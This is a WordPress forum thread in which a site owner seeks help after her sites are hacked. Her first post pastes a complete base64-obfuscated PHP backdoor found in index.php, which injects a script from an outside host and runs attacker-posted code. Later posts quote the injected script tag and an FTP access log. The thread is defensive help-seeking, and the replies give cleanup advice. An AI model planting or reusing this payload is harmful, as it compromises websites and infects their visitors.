Forums

WordPress › Support » How-To and Troubleshooting

All my websites hacked 'silence is golden'? (24 posts)

  1. talia
    Member
    Posted 1 month ago #

    I've had all my websites hacked. I'm restoring a backup from a week ago but I'm not really sure what has caused it or if there is anyway of tracking how it happened. I will find someone to help me harden up the files for future protection but i would like to sort it.

    PLUGIN QUERY???
    the only new plugin i've added is the si-contact-form which seems to have good ratings, so i don't imagine it's the cause. but maybe... as it's the only new plugin in the time that this happened. however as it spread to other websites i'm unsure

    SILENCE IS GOLDEN???
    I noticed this in an index.php file

    at the end it says Silence is golden
    does anyone know if it's a specific hack?

    i've had my wordpress files hacked, plus some other php files in other directories.

    <?php eval(base64_decode('aWYoIWlzc2V0KCRzc2hrZjEpKXtmdW5jdGlvbiBzc2hrZigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihwcmVnX21hdGNoKCcjIHdpZHRoXHMqPVxzKltcJyJdPzAqWzAxXVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDJWNkxYQmhhVzUwYVc1bmFXNWpMbU52YlM5c2FXNWtlUzlwYm1SbGVDNXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gc3Noa2YyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHNzaGtmMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkc3Noa2YxKSljYWxsX3VzZXJfZnVuYygkc3Noa2YxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3NzaGtmJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlICRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3NzaGtmJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHNzaGtmbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignc3Noa2YyJykpIT0nc3Noa2YyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?><?php
// Silence is golden.
?>

  2. iridiax
    Member
    Posted 1 month ago #

    The eval(base64_decode stuff is a hack.

  3. talia
    Member
    Posted 1 month ago #

    OK I guessed it must be. Thanks for the input. I just wish I knew where it came from

    If I delete that part will it fix things? I managed to fix my basic (non wordpress) files by deleting that part of the code. But WP has more files and that code is probably in more places.

    Any tips on how to get rid of it? I tried restoring my backup from a week ago but it doesn't seem to be working. It's weird as I only noticed the problem 3 days ago so I thought the backup from a week ago would be good.

  4. talia
    Member
    Posted 1 month ago #

    I've worked out which files to remove the eval(base64_decode code from and it seems to be working.

    how likely is it that i'll be hacked again soon? my tech person says she can't look at it for 2 weeks to "harden" up the files. i'm wondering if i should hire someone else???

  5. iridiax
    Member
    Posted 1 month ago #

    See: http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

  6. talia
    Member
    Posted 1 month ago #

    excellent thanks for that

  7. talia
    Member
    Posted 1 month ago #

    The guys at blue host suggest changing the names of the scripts from php to html to make it harder for the hackers. Any thoughts on this idea?

    My sites have already been hacked again. Very frustrating. I'm not very techie so it's taking me a while to make the changes they suggest

  8. talia
    Member
    Posted 1 month ago #

    Lots of questions! If anyone can help I'd appreciate it

    I've read the instructions on restoring the files and I'm good to go, however I'm wondering how to handle the issue of multiple websites.

    I host with bluehost, and have multiple domains. Some wordpress, some aren't but most are php based. They are all on the same ftp account. If I put a fresh site on there with the latest version of WP, will the hackers still be able to hack that, because they still have back door access to the other php files on the system?

    i.e. can I progressively restore one domain at a time, or will they get hacked if I do that? do I need instead to clear out all the php based domains?

    Also, I see that images aren't usually hacked. What about pdf or mp3 files that I have online?

    Will my html files in other domains be okay? They don't seem to have been hacked even though they're on the same ftp account.

    Thanks!

  9. talia
    Member
    Posted 1 month ago #

    Does anyone know if I need to remove all the websites at the same time or can progressively remove clean and then replace with the latest WP?

  10. jonimueller
    Member
    Posted 1 month ago #

    You definitely should change your web hosting account passwords. And this won't help you now, but for future, you should install several plugins such as vLogger and WP Exploit Scanner:

    http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/

    http://ocaoimh.ie/exploit-scanner/

  11. iridiax
    Member
    Posted 1 month ago #

    They are all on the same ftp account.

    Be sure to change all passwords, including ftp/webhost ones. After backing up, I would do a major cleanout of all hacked sites and change all passwords so that the source of the infection is eliminated. You don't want to have to clean up hacked sites over and over. Also see: http://codex.wordpress.org/Hardening_WordPress

  12. webcraftsman
    Member
    Posted 1 month ago #

    Is there some vulnerability that is allowing hackers to gain access to WP 2.8.4? I was hacked over the weekend. I am doing the delete files off the server and reupload to clean my system as well as change passwords.

    Anyone notice an increase in hacks with updated software?

  13. talia
    Member
    Posted 1 month ago #

    You don't want to have to clean up hacked sites over and over.

    Yes that was my fear. So if I understand you correctly I need to install the latest version of WP on ALL websites at the same time, or it will be able to hack into WP 2.8.4?

    Is this domain reference http://ez-paintinginc.com anything to do with the hack? it seems to be on some of my html website but I can't think how that reference got there? It appears to link to some sort of script and I am not sure if it's another form of hack or something legit. I can't find anything on it in google

  14. talia
    Member
    Posted 1 month ago #

    Thanks jonimueller and iridiax for the links :)

  15. talia
    Member
    Posted 1 month ago #

    Does anyone know if http://ez-paintinginc.com is a hack or legitimate?

  16. iridiax
    Member
    Posted 1 month ago #

    That site is apparently hacked as well. Hackers can host their scripts/files on hacked sites and then link to them on other hacked sites.

  17. talia
    Member
    Posted 1 month ago #

    Ahhh! Thanks, that explains why the ez-painting site was blank.

    It seems like the hackers have got into my html files and inserted scripts hosted at http://ez-paintinginc.com so the problem is bigger than I thought. I've deleted some of my websites, but I haven't replaced them with new sites yet or restored wordpress. Getting there slowly

  18. neo721x
    Member
    Posted 1 month ago #

    There is seems to be major hacking over a wide range of WP blogs. I think theres something the WP guys arent telling us. A bit of info wouldnt go astray...

  19. bh_WP_fan
    Member
    Posted 1 month ago #

    neo721x: All the changes between releases are listed in the change logs. See if you can find any security updates between 1.8.4 and 1.8.5 and you'll have an idea if there were any security issues they were aware of and fixed.

    As to hacking, it is becoming more common all over the place, not just with WordPress. These hacks are happening everywhere. Go check out Joomla, or any other php/database-driven software. Hackers are always finding new ways to hack websites.

  20. talia
    Member
    Posted 1 month ago #

    Someone told me there is a way I can find the IP address of the hacker and block it. Anyone know how? And is it worth doing it? I figure they probably have rotating IP addresses anyway.

    This keeps finding its way onto my html pages
    <script src=http://ez-paintinginc.com/lindy/index.php ></script>

    I hope visitors to my site aren't getting some sort of trojan or something happening to their computers.

  21. talia
    Member
    Posted 1 month ago #

    I found a log file for http://ftp.mydomain.com

    It says it has been accessed by IP 216.97.230.50 which whois shows as being hosting company LunarPages. They are not my hosting company so there is no reason why anyone from there should be accessing my ftp account

    OrgName: Lunar Pages
    OrgID: ACIDL
    Address: 100 East La Habra Blvd.
    City: La Habra
    StateProv: CA
    PostalCode: 90631
    Country: US

    Here is a sample from the log

    Fri Oct 23 15:50:34 2009 0 216.97.230.50 2029 /home2/mydomain/public_html/folder/wp-content/plugins/hello.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 5663 /home2/mydomain/public_html/folder/wp-content/plugins/sidebarLogin.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 31 /home2/mydomain/public_html/folder/wp-content/index.php a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:34 2009 0 216.97.230.50 1920 /home2/mydomain/public_html/folder/wp-content/index.php a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 8635 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 8720 /home2/mydomain/public_html/folder/wp-includes/js/autosave.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 30316 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 30401 /home2/mydomain/public_html/folder/wp-includes/js/colorpicker.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:35 2009 0 216.97.230.50 125339 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ o r mydomain ftp 1 * c
    Fri Oct 23 15:50:36 2009 0 216.97.230.50 125424 /home2/mydomain/public_html/folder/wp-includes/js/prototype.js a _ i r mydomain ftp 1 * c
    Fri Oct 23 15:50:36 2009 0 216.97.230.50 10850 /home2/mydomain/public_html/folder/wp-includes/js/quicktags.js a _ o r mydomain ftp 1

    Could this be my hacker and is it safe to ban that IP? Any help appreciated

    Thanks :-)

  22. talia
    Member
    Posted 1 month ago #

    P.S. The strange thing is that I've been in on the ftp account but my IP address doesn't show in the log

  23. bh_WP_fan
    Member
    Posted 1 month ago #

    If you don't know the IP address, I'd say to block it as you can always remove it later if needs be, though I don't think the blocking tools you have will be enough to keep them out of FTP if they are getting in with proper authentication methods. I'd suggest changing your password for cPanel, your blogs, your email addresses, and anything else you have which has a password. Also, look over some of the following:
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://helpdesk.bluehost.com/index.php/kb/article/000511

  24. talia
    Member
    Posted 1 month ago #

    Thanks

    I did block the IP but this morning I found no evidence anyone had been in the ftp account according to the access logs but this

    <script src=http://ez-paintinginc.com/lindy/index.php ></script>

    has been inserted back into the html file

    I don't really understand a lot of the technical stuff. i'm just doing what I can until my tech person is available to work on it. Hopefully she'll know how to set up the .htaccess file and other things to help protect my site

Reply

You must log in to post.

About this Topic

Tags